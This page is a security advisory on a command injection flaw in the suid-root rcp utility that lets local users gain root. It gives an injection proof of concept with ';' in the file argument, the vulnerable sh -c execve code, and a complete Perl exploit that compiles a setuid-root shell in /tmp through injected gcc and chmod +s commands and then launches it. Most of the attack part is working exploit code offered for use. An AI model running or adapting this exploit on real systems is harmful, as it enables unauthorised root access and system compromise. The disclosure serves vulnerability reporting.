|
|
|
|
| |
| There is a bug in /usr/sbin/rcp, which enables an attacker to specify a list of commands that will be arbitrarily executed by rcp. The /usr/sbin/rcp program is set with suid root on some systems allowing local users to gain root privileges. |
| |
Credit:
The information has been provided by Roman Drahtmueller, tlabs and Andrew Griffiths.
|
| |
Example:
$ ls -alF `which rcp`
-rwsr-xr-x 1 root root 14492 Jul 21 22:43
/usr/sbin/rcp
$ cd /tmp
$ echo bla > bob
$ rcp 'bob bobalina; /usrt/bin/id;' 127.0.0.1
uid=500(andrewg) gid=500(andrewg) groups=500(andrewg)
sh: 127.0.0.1: command not found.
Now doing a quick ltrace on this sequence will reveal that rcp doesn't remove ';' and '`' allowing us to include our own arbitrary commands.
Problematic code:
The code below reveals the sequence vfork(); setuid(getuid()); execve("/bin/sh",args,envp);
Therefore, if you do shell escape-tricks, it will allow you to execute additional commands.
Since the daemon runs as `rcp -t <target-dir>? from a shell, the following can happen: `rcp foo remhost:'/tmp;chmod 777 .'?
if (setuid(userid)) {
fprintf(stderr, "rcp: child: setuid: %s\n",
strerror(errno));
_exit(1);
}
args[0] = "sh";
args[1] = "-c";
args[2] = s;
args[3] = NULL;
/* Defeat C type system to permit passing char ** to
execve */
argsfoo = args;
memcpy(&argsbar, &argsfoo, sizeof(argsfoo));
execve(_PATH_BSHELL, argsbar, saved_environ);
_exit(127);
Exploit:
#!/usr/bin/perl -w
# exploits suid priveldges on rpc
# Not really tested this but hey
# works on redhat6.2
# not werk on freebsd4.1 stable
#
# bug discovered by
# Andrew Griffiths
#
# Exploit written by tlabs
# greetz to those that know me innit
#
# Please set your rcpfile
# this can be found by doing
#
# ls -alF `which rcp`
#
# have a lot of fun
$RCPFILE="/usr/bin/rcp" ;
# configure above innit
sub USAGE
{
print "$0\nWritten by Tlabs\n" ;
exit 0 ;
}
if ( ! -u "$RCPFILE" )
{
printf "rcp is not suid, quiting\n" ;
exit 0;
}
open(TEMP, ">>/tmp/shell.c")|| die "Something went wrong: $!" ;
printf TEMP "#include<unistd.h>\n#include<stdlib.h>\nint main()\n{" ;
printf TEMP " setuid(0);\n\tsetgid(0);\n\texecl(\"/bin/sh\",\"sh\",0);\n\treturn 0;\n}\n" ;
close(TEMP);
open(HMM, ">hey")|| die "Something went wrong: $!";
print HMM "Sploit written by tlabs, thanks to Andrew Griffiths for the bug report" ;
close(HMM);
system "rcp 'hey geezer; gcc -o /tmp/shell /tmp/shell.c;' localhost 2> /dev/null" ;
system "rcp 'hey geezer; chmod +s /tmp/shell;' localhost 2> /dev/null" ;
unlink("/tmp/shell.c");
unlink("hey");
unlink("geezer");
printf "Ok, too easy, we'll just launch a shell, lets hope shit went well innit:)\n" ;
exec '/tmp/shell' ;
|
|
|
|
|
